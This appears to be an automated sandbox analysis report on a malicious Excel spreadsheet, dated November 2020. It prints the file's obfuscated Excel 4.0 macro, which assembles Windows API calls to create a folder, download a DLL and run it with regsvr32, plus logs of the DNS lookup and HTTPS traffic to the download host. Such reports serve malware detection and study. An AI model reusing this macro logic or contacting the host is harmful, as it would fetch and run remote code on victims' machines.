                                                                                                                                                                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                                                              CALL("Ke"&????2!HY314&"32", "Cr"&????2!IA342&"yA", "JCJ", ????2!HP312&????2!HP327, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              CALL("U"&????2!IA332, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HP312&????2!HP327&????2!HP341, 0, 0)
                                                                                                                                                                                              
                                                                                                                                                                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312&????2!HP327,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                              "=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                                                                                                                                                                              "=CALL(""U""&????2!IA332,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HP312&????2!HP327&????2!HP341,0,0)"=EXEC(????3!W36&????2!HP312&????2!HP327&????2!HP341)=HALT()

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:01:46.152203083 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:46.173379898 CET4434970678.46.235.88192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:46.173521042 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:46.175168991 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:46.471893072 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:46.971856117 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:47.675100088 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:48.972434998 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:50.190886974 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:51.472265959 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:53.972460032 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:01:58.863501072 CET49706443192.168.2.378.46.235.88
                                                                                                                                                                                              Nov 29, 2020 04:02:08.473673105 CET49706443192.168.2.378.46.235.88

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 29, 2020 04:01:28.816087961 CET5062053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:28.866506100 CET53506208.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:28.924714088 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:28.960041046 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:41.709986925 CET6015253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:41.759522915 CET53601528.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:42.016793966 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:42.055788994 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:43.159807920 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:43.220546961 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:44.175158024 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:44.210436106 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:46.114607096 CET5598453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:46.150192976 CET53559848.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:46.190922022 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:46.226324081 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:49.917573929 CET6418553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:49.944808960 CET53641858.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:50.258222103 CET5754453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:50.293621063 CET53575448.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:51.042660952 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:51.069705963 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:53.456742048 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:53.492194891 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:54.175499916 CET6349253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:54.202689886 CET53634928.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:55.264096975 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:55.291238070 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:55.568530083 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:55.595805883 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:55.921510935 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:55.957062006 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:57.155601978 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:57.191101074 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:58.216836929 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:58.254493952 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:58.984122038 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:59.023827076 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:01:59.290888071 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:01:59.317945957 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:00.302623987 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:00.330043077 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:01.293096066 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:01.320317984 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:02.409102917 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:02.436214924 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:03.401622057 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:03.428778887 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:04.408021927 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:04.435240030 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:05.639817953 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:05.667087078 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:06.610944986 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:06.646823883 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:07.610301971 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:07.637465954 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:08.710860968 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:08.746397018 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:09.046011925 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:09.089818001 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:09.725568056 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:09.752847910 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:18.043654919 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:18.080972910 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:30.470527887 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:30.497594118 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:02:34.220824957 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:02:34.257802963 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:03:05.544074059 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:03:05.571959019 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:03:07.290894032 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:03:07.326463938 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:13.363576889 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:13.398994923 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:13.725240946 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:13.763503075 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:14.130362988 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:14.157973051 CET53649108.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:14.752639055 CET5212353192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:14.788316965 CET53521238.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:15.045103073 CET5613053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:15.082721949 CET53561308.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:15.685803890 CET5633853192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:15.721496105 CET53563388.8.8.8192.168.2.3
                                                                                                                                                                                              Nov 29, 2020 04:04:16.039372921 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                              Nov 29, 2020 04:04:16.075092077 CET53594208.8.8.8192.168.2.3

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:01:46.114607096 CET192.168.2.38.8.8.80xf9eaStandard query (0)dtmh.grA (IP address)IN (0x0001)

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                              Nov 29, 2020 04:01:46.150192976 CET8.8.8.8192.168.2.30xf9eaNo error (0)dtmh.gr78.46.235.88A (IP address)IN (0x0001)

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:01:40
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0xaf0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:04:02:08
                                                                                                                                                                                              Start date:29/11/2020
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                                                                                                                                                                              Imagebase:0x13d0000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >